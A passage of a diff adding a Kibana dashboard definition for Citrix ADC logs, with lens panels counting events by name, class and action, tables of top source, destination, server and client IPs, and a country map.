"enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 14, + "i": "6339da61-ce3d-40ff-b7dc-4d5525f5ccf7", + "w": 24, + "x": 24, + "y": 78 + }, + "panelIndex": "6339da61-ce3d-40ff-b7dc-4d5525f5ccf7", + "title": "Top 10 Client Countries [Logs Citrix ADC]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-56ec7bd9-8eff-4c45-86fb-96ff48db7730", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "244824be-e6fc-4121-8159-e2a4e11c0a2a", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "56ec7bd9-8eff-4c45-86fb-96ff48db7730": { + "columnOrder": [ + "53ea2f90-830c-4e95-92cc-4af2de30cc28", + "69b6dfee-4f72-4b5e-b52e-bc8379433b25" + ], + "columns": { + "53ea2f90-830c-4e95-92cc-4af2de30cc28": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Event Name", + "operationType": "terms", + "params": { + "accuracyMode": true, + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "69b6dfee-4f72-4b5e-b52e-bc8379433b25", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "citrix.name" + }, + "69b6dfee-4f72-4b5e-b52e-bc8379433b25": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + 
"alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "244824be-e6fc-4121-8159-e2a4e11c0a2a", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "69b6dfee-4f72-4b5e-b52e-bc8379433b25" + ], + "layerId": "56ec7bd9-8eff-4c45-86fb-96ff48db7730", + "layerType": "data", + "position": "top", + "seriesType": "bar_horizontal_stacked", + "showGridlines": false, + "xAccessor": "53ea2f90-830c-4e95-92cc-4af2de30cc28" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar_horizontal_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "e89299e1-4cd9-49ef-89e8-3864d1224469", + "w": 24, + "x": 0, + "y": 92 + }, + "panelIndex": "e89299e1-4cd9-49ef-89e8-3864d1224469", + "title": "Events by Event Name [Logs Citrix ADC]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-56ec7bd9-8eff-4c45-86fb-96ff48db7730", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "8e92059b-9b18-4b02-b102-bef8a1787d78", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + 
"datasourceStates": { + "formBased": { + "layers": { + "56ec7bd9-8eff-4c45-86fb-96ff48db7730": { + "columnOrder": [ + "53ea2f90-830c-4e95-92cc-4af2de30cc28", + "69b6dfee-4f72-4b5e-b52e-bc8379433b25" + ], + "columns": { + "53ea2f90-830c-4e95-92cc-4af2de30cc28": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Event Class ", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "69b6dfee-4f72-4b5e-b52e-bc8379433b25", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "citrix.device_event_class_id" + }, + "69b6dfee-4f72-4b5e-b52e-bc8379433b25": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "8e92059b-9b18-4b02-b102-bef8a1787d78", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + 
"yRight": 0 + }, + "layers": [ + { + "accessors": [ + "69b6dfee-4f72-4b5e-b52e-bc8379433b25" + ], + "layerId": "56ec7bd9-8eff-4c45-86fb-96ff48db7730", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "xAccessor": "53ea2f90-830c-4e95-92cc-4af2de30cc28" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "d9220f99-2e6e-4c43-b55a-54cb8b3cb55f", + "w": 24, + "x": 24, + "y": 92 + }, + "panelIndex": "d9220f99-2e6e-4c43-b55a-54cb8b3cb55f", + "title": "Events by Event Class [Logs Citrix ADC]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-1d2c9c58-fe87-46cd-943e-90fb37a18c6e", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "1d0d4d94-f9bb-4246-aa05-c02d3a7d23ec", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "1d2c9c58-fe87-46cd-943e-90fb37a18c6e": { + "columnOrder": [ + "7fb3a823-c45d-433b-8763-c38c7944cb79", + "a7ba9e4e-58b8-4177-a16c-6c5e225bd2cf" + ], + "columns": { + "7fb3a823-c45d-433b-8763-c38c7944cb79": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Event Action", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "a7ba9e4e-58b8-4177-a16c-6c5e225bd2cf", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": 
"ordinal", + "sourceField": "event.action" + }, + "a7ba9e4e-58b8-4177-a16c-6c5e225bd2cf": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "1d0d4d94-f9bb-4246-aa05-c02d3a7d23ec", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "a7ba9e4e-58b8-4177-a16c-6c5e225bd2cf" + ], + "layerId": "1d2c9c58-fe87-46cd-943e-90fb37a18c6e", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "xAccessor": "7fb3a823-c45d-433b-8763-c38c7944cb79" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "a02365ac-b2de-4f1c-a59f-ec763f0634e7", + "w": 24, + 
"x": 0, + "y": 107 + }, + "panelIndex": "a02365ac-b2de-4f1c-a59f-ec763f0634e7", + "title": "Events by Action [Logs Citrix ADC]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-35179640-438c-41c3-a0c9-1eb27a1929d9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "baa1a399-bb78-458e-a95e-da29abcb3374", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "35179640-438c-41c3-a0c9-1eb27a1929d9": { + "columnOrder": [ + "d49ceaa7-1a83-411e-a6ea-db0fcbdc46ca", + "5ad27162-a387-4774-992e-225bd38fcfe7" + ], + "columns": { + "5ad27162-a387-4774-992e-225bd38fcfe7": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "d49ceaa7-1a83-411e-a6ea-db0fcbdc46ca": { + "customLabel": true, + "dataType": "ip", + "isBucketed": true, + "label": "Source IP", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "5ad27162-a387-4774-992e-225bd38fcfe7", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "source.ip" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "baa1a399-bb78-458e-a95e-da29abcb3374", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": 
"citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "d49ceaa7-1a83-411e-a6ea-db0fcbdc46ca" + }, + { + "columnId": "5ad27162-a387-4774-992e-225bd38fcfe7" + } + ], + "layerId": "35179640-438c-41c3-a0c9-1eb27a1929d9", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "8d5ccace-9260-4464-af7c-6165af68480e", + "w": 24, + "x": 24, + "y": 107 + }, + "panelIndex": "8d5ccace-9260-4464-af7c-6165af68480e", + "title": "Top 10 Source IP [Logs Citrix ADC]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-35179640-438c-41c3-a0c9-1eb27a1929d9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "6cab624e-160d-43ec-8f70-e80787f5d46b", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "35179640-438c-41c3-a0c9-1eb27a1929d9": { + "columnOrder": [ + "d49ceaa7-1a83-411e-a6ea-db0fcbdc46ca", + "5ad27162-a387-4774-992e-225bd38fcfe7" + ], + "columns": { + "5ad27162-a387-4774-992e-225bd38fcfe7": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "d49ceaa7-1a83-411e-a6ea-db0fcbdc46ca": { + "customLabel": true, + "dataType": "ip", + "isBucketed": true, + "label": "Destination IP", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + 
"includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "5ad27162-a387-4774-992e-225bd38fcfe7", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "destination.ip" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "6cab624e-160d-43ec-8f70-e80787f5d46b", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "d49ceaa7-1a83-411e-a6ea-db0fcbdc46ca" + }, + { + "columnId": "5ad27162-a387-4774-992e-225bd38fcfe7" + } + ], + "layerId": "35179640-438c-41c3-a0c9-1eb27a1929d9", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "c5c252e5-add3-46e7-9d63-133881e24666", + "w": 24, + "x": 0, + "y": 122 + }, + "panelIndex": "c5c252e5-add3-46e7-9d63-133881e24666", + "title": "Top 10 Destination IP [Logs Citrix ADC]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-35179640-438c-41c3-a0c9-1eb27a1929d9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4a5fe18d-b8d0-45d1-9937-9bfe329f4c85", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + 
"35179640-438c-41c3-a0c9-1eb27a1929d9": { + "columnOrder": [ + "d49ceaa7-1a83-411e-a6ea-db0fcbdc46ca", + "5ad27162-a387-4774-992e-225bd38fcfe7" + ], + "columns": { + "5ad27162-a387-4774-992e-225bd38fcfe7": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "d49ceaa7-1a83-411e-a6ea-db0fcbdc46ca": { + "customLabel": true, + "dataType": "ip", + "isBucketed": true, + "label": "Server IP", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "5ad27162-a387-4774-992e-225bd38fcfe7", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "server.ip" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "4a5fe18d-b8d0-45d1-9937-9bfe329f4c85", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "d49ceaa7-1a83-411e-a6ea-db0fcbdc46ca" + }, + { + "columnId": "5ad27162-a387-4774-992e-225bd38fcfe7" + } + ], + "layerId": "35179640-438c-41c3-a0c9-1eb27a1929d9", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + 
"enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "c6e8140c-ab76-433a-9309-8bdb471ae311", + "w": 24, + "x": 24, + "y": 122 + }, + "panelIndex": "c6e8140c-ab76-433a-9309-8bdb471ae311", + "title": "Top 10 Server IP [Logs Citrix ADC]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-35179640-438c-41c3-a0c9-1eb27a1929d9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d8c7fbbb-d7dc-4b07-99ca-c30b4334fdf6", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "35179640-438c-41c3-a0c9-1eb27a1929d9": { + "columnOrder": [ + "d49ceaa7-1a83-411e-a6ea-db0fcbdc46ca", + "5ad27162-a387-4774-992e-225bd38fcfe7" + ], + "columns": { + "5ad27162-a387-4774-992e-225bd38fcfe7": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "d49ceaa7-1a83-411e-a6ea-db0fcbdc46ca": { + "customLabel": true, + "dataType": "ip", + "isBucketed": true, + "label": "Client IP", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "5ad27162-a387-4774-992e-225bd38fcfe7", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "client.ip" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + 
"field": "data_stream.dataset", + "index": "d8c7fbbb-d7dc-4b07-99ca-c30b4334fdf6", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "d49ceaa7-1a83-411e-a6ea-db0fcbdc46ca" + }, + { + "columnId": "5ad27162-a387-4774-992e-225bd38fcfe7" + } + ], + "layerId": "35179640-438c-41c3-a0c9-1eb27a1929d9", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "26ab28ea-2f8d-4612-92ed-0bc9cf0f56c2", + "w": 24, + "x": 0, + "y": 137 + }, + "panelIndex": "26ab28ea-2f8d-4612-92ed-0bc9cf0f56c2", + "title": "Top 10 Client IP [Logs Citrix ADC]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "layerListJSON": 
"[{\"locale\":\"autoselect\",\"sourceDescriptor\":{\"type\":\"EMS_TMS\",\"isAutoSelect\":true,\"lightModeDefault\":\"road_map_desaturated\"},\"id\":\"5fa2b795-79cb-4d92-baca-6764236a1761\",\"label\":null,\"minZoom\":0,\"maxZoom\":24,\"alpha\":1,\"visible\":true,\"style\":{\"type\":\"EMS_VECTOR_TILE\",\"color\":\"\"},\"includeInFitToBounds\":true,\"type\":\"EMS_VECTOR_TILE\"},{\"joins\":[{\"leftField\":\"iso2\",\"right\":{\"type\":\"ES_TERM_SOURCE\",\"id\":\"4d75bc0f-290d-44c9-a3c5-74ecdbc20a06\",\"term\":\"client.geo.country_iso_code\",\"metrics\":[{\"type\":\"count\"}],\"applyGlobalQuery\":true,\"applyGlobalTime\":true,\"applyForceRefresh\":true,\"indexPatternRefName\":\"layer_1_join_0_index_pattern\"}}],\"sourceDescriptor\":{\"type\":\"EMS_FILE\",\"id\":\"world_countries\",\"tooltipProperties\":[\"iso2\"]},\"style\":{\"type\":\"VECTOR\",\"properties\":{\"icon\":{\"type\":\"STATIC\",\"options\":{\"value\":\"marker\"}},\"fillColor\":{\"type\":\"DYNAMIC\",\"options\":{\"color\":\"Yellow to 
Red\",\"colorCategory\":\"palette_0\",\"field\":{\"name\":\"__kbnjoin__count__4d75bc0f-290d-44c9-a3c5-74ecdbc20a06\",\"origin\":\"join\"},\"fieldMetaOptions\":{\"isEnabled\":true,\"sigma\":3},\"type\":\"ORDINAL\"}},\"lineColor\":{\"type\":\"STATIC\",\"options\":{\"color\":\"#3d3d3d\"}},\"lineWidth\":{\"type\":\"STATIC\",\"options\":{\"size\":1}},\"iconSize\":{\"type\":\"STATIC\",\"options\":{\"size\":6}},\"iconOrientation\":{\"type\":\"STATIC\",\"options\":{\"orientation\":0}},\"labelText\":{\"type\":\"DYNAMIC\",\"options\":{\"field\":{\"name\":\"__kbnjoin__count__4d75bc0f-290d-44c9-a3c5-74ecdbc20a06\",\"origin\":\"join\"}}},\"labelColor\":{\"type\":\"STATIC\",\"options\":{\"color\":\"#000000\"}},\"labelSize\":{\"type\":\"STATIC\",\"options\":{\"size\":14}},\"labelZoomRange\":{\"options\":{\"useLayerZoomRange\":true,\"minZoom\":0,\"maxZoom\":24}},\"labelBorderColor\":{\"type\":\"STATIC\",\"options\":{\"color\":\"#FFFFFF\"}},\"symbolizeAs\":{\"options\":{\"value\":\"circle\"}},\"labelBorderSize\":{\"options\":{\"size\":\"SMALL\"}},\"labelPosition\":{\"options\":{\"position\":\"CENTER\"}}},\"isTimeAware\":true},\"id\":\"eee46f19-a419-4463-ad99-acaa52789e83\",\"label\":\"Client Countries\",\"minZoom\":0,\"maxZoom\":24,\"alpha\":0.75,\"visible\":true,\"includeInFitToBounds\":true,\"type\":\"GEOJSON_VECTOR\",\"disableTooltips\":false},{\"joins\":[{\"leftField\":\"iso2\",\"right\":{\"type\":\"ES_TERM_SOURCE\",\"id\":\"01cee178-3bd9-42d4-b558-abfd4e64f87a\",\"term\":\"source.geo.country_iso_code\",\"metrics\":[{\"type\":\"count\"}],\"applyGlobalQuery\":true,\"applyGlobalTime\":true,\"applyForceRefresh\":true,\"indexPatternRefName\":\"layer_2_join_0_index_pattern\"}}],\"sourceDescriptor\":{\"type\":\"EMS_FILE\",\"id\":\"world_countries\",\"tooltipProperties\":[\"iso2\"]},\"style\":{\"type\":\"VECTOR\",\"properties\":{\"icon\":{\"type\":\"STATIC\",\"options\":{\"value\":\"marker\"}},\"fillColor\":{\"type\":\"DYNAMIC\",\"options\":{\"color\":\"Yellow to 
Red\",\"colorCategory\":\"palette_0\",\"field\":{\"name\":\"__kbnjoin__count__01cee178-3bd9-42d4-b558-abfd4e64f87a\",\"origin\":\"join\"},\"fieldMetaOptions\":{\"isEnabled\":true,\"sigma\":3},\"type\":\"ORDINAL\"}},\"lineColor\":{\"type\":\"STATIC\",\"options\":{\"color\":\"#3d3d3d\"}},\"lineWidth\":{\"type\":\"STATIC\",\"options\":{\"size\":1}},\"iconSize\":{\"type\":\"STATIC\",\"options\":{\"size\":6}},\"iconOrientation\":{\"type\":\"STATIC\",\"options\":{\"orientation\":0}},\"labelText\":{\"type\":\"DYNAMIC\",\"options\":{\"field\":{\"name\":\"__kbnjoin__count__01cee178-3bd9-42d4-b558-abfd4e64f87a\",\"origin\":\"join\"}}},\"labelColor\":{\"type\":\"STATIC\",\"options\":{\"color\":\"#000000\"}},\"labelSize\":{\"type\":\"STATIC\",\"options\":{\"size\":14}},\"labelZoomRange\":{\"options\":{\"useLayerZoomRange\":true,\"minZoom\":0,\"maxZoom\":24}},\"labelBorderColor\":{\"type\":\"STATIC\",\"options\":{\"color\":\"#FFFFFF\"}},\"symbolizeAs\":{\"options\":{\"value\":\"circle\"}},\"labelBorderSize\":{\"options\":{\"size\":\"SMALL\"}},\"labelPosition\":{\"options\":{\"position\":\"CENTER\"}}},\"isTimeAware\":true},\"id\":\"58d98668-4206-42c5-99d7-58ef15f5b739\",\"label\":\"Source Countries\",\"minZoom\":0,\"maxZoom\":24,\"alpha\":0.75,\"visible\":true,\"includeInFitToBounds\":true,\"type\":\"GEOJSON_VECTOR\",\"disableTooltips\":false}]", + "mapStateJSON": 
"{\"adHocDataViews\":[],\"zoom\":1.4,\"center\":{\"lon\":0,\"lat\":19.94277},\"timeFilters\":{\"from\":\"now-15y\",\"to\":\"now\"},\"refreshConfig\":{\"isPaused\":true,\"interval\":60000},\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filters\":[{\"meta\":{\"disabled\":false,\"negate\":false,\"alias\":null,\"index\":\"logs-*\",\"key\":\"data_stream.dataset\",\"field\":\"data_stream.dataset\",\"params\":{\"query\":\"citrix_adc.log\"},\"type\":\"phrase\"},\"query\":{\"match_phrase\":{\"data_stream.dataset\":\"citrix_adc.log\"}},\"$state\":{\"store\":\"appState\"}}],\"settings\":{\"autoFitToDataBounds\":false,\"backgroundColor\":\"#ffffff\",\"customIcons\":[],\"disableInteractive\":false,\"disableTooltipControl\":false,\"hideToolbarOverlay\":false,\"hideLayerControl\":false,\"hideViewControl\":false,\"initialLocation\":\"LAST_SAVED_LOCATION\",\"fixedLocation\":{\"lat\":0,\"lon\":0,\"zoom\":2},\"browserLocation\":{\"zoom\":2},\"keydownScrollZoom\":false,\"maxZoom\":24,\"minZoom\":0,\"showScaleControl\":false,\"showSpatialFilters\":true,\"showTimesliderToggleButton\":true,\"spatialFiltersAlpa\":0.3,\"spatialFiltersFillColor\":\"#DA8B45\",\"spatialFiltersLineColor\":\"#DA8B45\"}}", + "title": "", + "uiStateJSON": "{\"isLayerTOCOpen\":true,\"openTOCDetails\":[]}" + }, + "enhancements": {}, + "hiddenLayers": [], + "hidePanelTitles": false, + "isLayerTOCOpen": false, + "mapBuffer": { + "maxLat": 66.51326, + "maxLon": 180, + "minLat": -66.51326, + "minLon": -180 + }, + "mapCenter": { + "lat": 19.94277, + "lon": 0, + "zoom": 1.4 + }, + "openTOCDetails": [] + }, + "gridData": { + "h": 15, + "i": "164d7357-8f59-4773-a775-fe7faee555de", + "w": 24, + "x": 24, + "y": 137 + }, + "panelIndex": "164d7357-8f59-4773-a775-fe7faee555de", + "title": "Source/Client Connections [Logs Citrix ADC]", + "type": "map", + "version": "8.7.1" + } + ], + "timeRestore": false, + "title": "[Logs Citrix ADC] Overview", + "version": 1 + }, + "coreMigrationVersion": "8.7.1", + "created_at": 
"2024-03-15T10:48:42.289Z", + "id": "citrix_adc-95709fd0-e130-11ee-adb0-b71252739438", + "migrationVersion": { + "dashboard": "8.7.0" + }, + "references": [ + { + "id": "logs-*", + "name": "f7acb623-11e3-4403-9b9b-fc30630b7449:indexpattern-datasource-layer-e2506703-c355-4307-9b8c-623fa77c78a6", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "f7acb623-11e3-4403-9b9b-fc30630b7449:a4952cfd-1931-44ff-a055-45881e87fbf9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "5e9be0e0-4605-4e82-89e2-d18942be9929:indexpattern-datasource-layer-e2506703-c355-4307-9b8c-623fa77c78a6", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "5e9be0e0-4605-4e82-89e2-d18942be9929:45a5b385-2216-447e-b0cd-f480a8a4c212", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ed9aa7e1-608b-4b65-8f0f-b64432678cd2:indexpattern-datasource-layer-e2506703-c355-4307-9b8c-623fa77c78a6", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ed9aa7e1-608b-4b65-8f0f-b64432678cd2:57891f44-e3cc-4c13-a561-98af9b658060", + "type": "index-pattern" + }, + { + 